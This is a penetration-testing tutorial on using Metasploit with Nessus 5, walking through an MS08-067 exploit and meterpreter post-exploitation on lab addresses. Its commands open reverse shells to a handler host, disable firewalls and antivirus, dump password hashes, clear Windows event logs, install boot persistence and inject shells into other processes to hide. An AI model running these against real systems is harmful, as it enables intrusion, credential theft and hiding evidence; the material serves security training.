Penetration testing and shell tossing with Metasploit
Pen Test Tips
The Metasploit Framework [1] is a penetration testing toolkit, exploit-development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. By mixing and matching payloads, encoders, and NOP slide generators [2] with exploit modules, you can solve almost any exploit-related task.
In previous articles, I introduced you to the metasploit environment, the tools that professional attackers use [3], and how intruders hide malicious files from virus scanners [4]. In this article, I will walk you through using the latest version of the Nessus pre-built plugin filter Metasploit Framework in your penetration testing. You will get a glimpse at how pen testers use Metasploit to probe and penetrate a real-world system. I will also cover some useful Metasploit tips for achieving privilege escalation. For instance, wouldn't it be great to have a shell on another computer just in case you lose your meterpreter shell?
Integrating Nessus 5 with Metasploit
With the release of Nessus 5 configuration vulnerability scanning tool by Tenable Network Security, users now have better filtering, analysis, and reporting, as well as faster scanning time. The Metasploit Nessus plugin allows you to select only those checks that cover vulnerabilities whose exploits are in the Metasploit Exploit framework.
To start, go to the Tenable site [5], download Nessus 5, and install it. The new installation will reside in /opt/nessus and will install over the top of any previous Nessus versions. Start the nessus daemon and open your web browser to https://localhost:8834, then log in, go to Policies, and click Add (see Figure 1). Give your policy a title and click Next. On the Credentials page, leave the default settings and click Next at the bottom.
The Plugins page lets you add a filter. A drop-down list presents many different options; choose Metasploit Exploit Framework (make sure is equal to and true are selected, and click Save – see Figure 2). Next, disable all plugins, select the plugin family you want to enable, and click on Enable Plugins in the upper-right corner of the pane. Do this for all plugins you want to enable, then click Submit at the bottom.
To begin a scan, click on Scans. Name the scan and type run now, scheduled, or template. In the Policy drop-down, pick the policy you created earlier, then select a target. Now you can start a scan; the time required for the scan will be surprisingly brief. Afterward, you receive a report that lists the Plugin ID, Count, Severity, Name, and Family of each plugin as it relates to the Metasploit Framework (see Figure 3).
The Name section tells you which Metasploit exploits have the best chance of being successful against the system you are testing.
To start a scan in the Metasploit Framework itself, start the Metasploit msfconsole console and load Nessus with the command:
msf > load nessus
Once the plugins are loaded, connect to the server.
msf > nessus_connect cr0wn:password@localhost ok
Now show the available plugins with the nessus_policy_list command (see Figure 4).
You can use the policy to scan the network by using the nessus_scan_new command and adding the policy ID, the name of scan, and a target IP range. For example, the command
nessus_scan_new 5 windozxp 10.10.3.219
will target a single Windows XP box with the IP address 10.10.3.219 (Figure 5).
nessus_scan_new (bottom).If you are connected to a database within the Metasploit Framework, you can open a view of the information from the console; otherwise, you can view the information from a web browser.
Now you can select an exploit to use on the target system. Suppose I want to use the MS08-067 flaw, which will get a meterpreter shell on the target computer. To accomplish this, I do the following:
msf > use exploit/windows/smb/ms08_067_netapi msf > set payload windows/meterpreter/reverse_tcp msf > set lhost 10.10.3.218 msf > set lport 5555 msf > set rhost 10.10.3.188 msf > exploit meterpreter >
Useful meterpreter Commands
Now that I have a meterpreter shell on the Windows box, I have a number of options. For instance, I can check to see if the target computer is a virtual machine or has an anti-virus program running. I can also see what the local subnet looks like and what kind of security configuration is on the victim's system. Metasploit comes with some useful scripts to perform these tasks.
meterpreter > run checkvm
The next command shows the help menu with options:
meterpreter > run getcountermeasure -h
Choose -d to disable the built-in firewall:
meterpreter > run getcountermeasure -d
To kill most antivirus programs, run the killav script:
meterpreter > run killav
To identify the local subnet mask the victim is on, run get_local_subnets:
meterpreter > run get_local_subnets
You might want to search the host for interesting information, such as a list of files by file type (*.pdf, *.txt, *.doc, *.jpg, etc.). To do so, use the search function in meterpreter:
meterpreter > search -h meterpreter > search -f *.pdf
To get some detailed information about the system, use the winenum script and the scraper script. The winenum script dumps tokens and hashes, providing you with lots of information (see Figure 6). The scraper script pulls down registry and system information:
meterpreter > run winenum meterpreter > run scraper
winenum command in the meterpreter shell.Now I want to delete the logfiles. To do this, I open up the meterpreter Scripting menu by using the irb command. Then I issue the following commands at the >> prompt:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> log = client.sys.eventlog.open('system')
>> log.clear
While I'm at it, I'll go ahead and delete the security log and application log by changing system in the preceding commands to security and application.
Being able to shove a meterpreter shell to team members with which you are performing a pen test is valuable. This option had not presented itself to me until I took a class on Industrial Control Systems Advanced Cybersecurity given by US-CERT [6]. I would recommend anyone doing work in the realm of ICS/SCADA systems to take this class. One day included a 12-hour exercise in which participants attacked (red team) or defended (blue team). I was on the red team, and having the ability to throw meterpreter shells to my fellow red team members was helpful. In the rest of this article, I'll show you a few examples of how to throw a meterpreter shell.
In the first example, I use the meterpreter script persistence (to see a list of options, use the -h switch):
Meterpreter > run persistence -h Meterpreter > run persistence -X -i 5 -p 5555 -r 10.10.3.180
The preceding command throws a meterpreter session to a remote system (with -r 10.10.3.180) at an interval of five seconds (-i 5), at port 5555 (-p 5555); then, that session is loaded in and run (-X) every time the machine boots up. The recipient would be waiting for the meterpreter shell by using multi/handler exploit module:
msf > use multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set lhost 10.10.3.180 msf > set lport 5555 msf > exploit
The second example is a bit stealthier and has the ability to inject your meterpreter shell into an existing process. After running the ps command from within your meterpreter shell, you get a list of running processes. Look through the list of processes and identify PIDs that will not draw attention, such as IEXPLORER.EXE PID 3664 (see Figure 7).
Injecting the meterpreter shell into the IEXPLORE.EXE process would be stealthy. I'll run the multi_meter_inject command using the following switches:
meterpreter > run multi_meter_inject -pt windows/meterpreter/reverse_tcp -mr 10.10.3.180 -p 3664
This command would throw a meterpreter session to remote system (-mr) 10.10.3.180, at port (-p) 3664. The recipient would be waiting for the meterpreter shell by using multi/handler, just changing the lport to 3664.
Now when performing some basic analysis on the victim's box, you can run tasklist and nothing looks out of place (see Figure 8), but when you run the netstat -an command, you will see the foreign connection (Figure 9).
tasklist command does not reveal any evidence of the intrusion.
netstat -an still reveals evidence of a foreign connection.A third way to send off meterpreter shells is to use the meterpreter script duplicate. At the meterpreter prompt, issue:
meterpreter > run duplicate -h
This preceding command will give you the various available options, and the following command will send a meterpreter shell to the IP address 10.10.3.180 on the default port of 4546 (Figure 10):
meterpreter > run duplicate -r 10.10.3.180
duplicate script.You can run a packet sniffer on the target system after you allow your team member to obtain a meterpreter shell. This meterpreter script is called packetrecorder and allows some more granularities when capturing packets:
meterpreter > run packetrecorder
To determine the interface to listen on, issue the command run packetrecorder -li. This command lists network interfaces; choose an interface and a destination to write the file to:
meterpreter > run packetrecorder -i -l /home/tmp/ [*] Packet capture interval is 30 Seconds
You can then review the file later with Wireshark or tcpdump.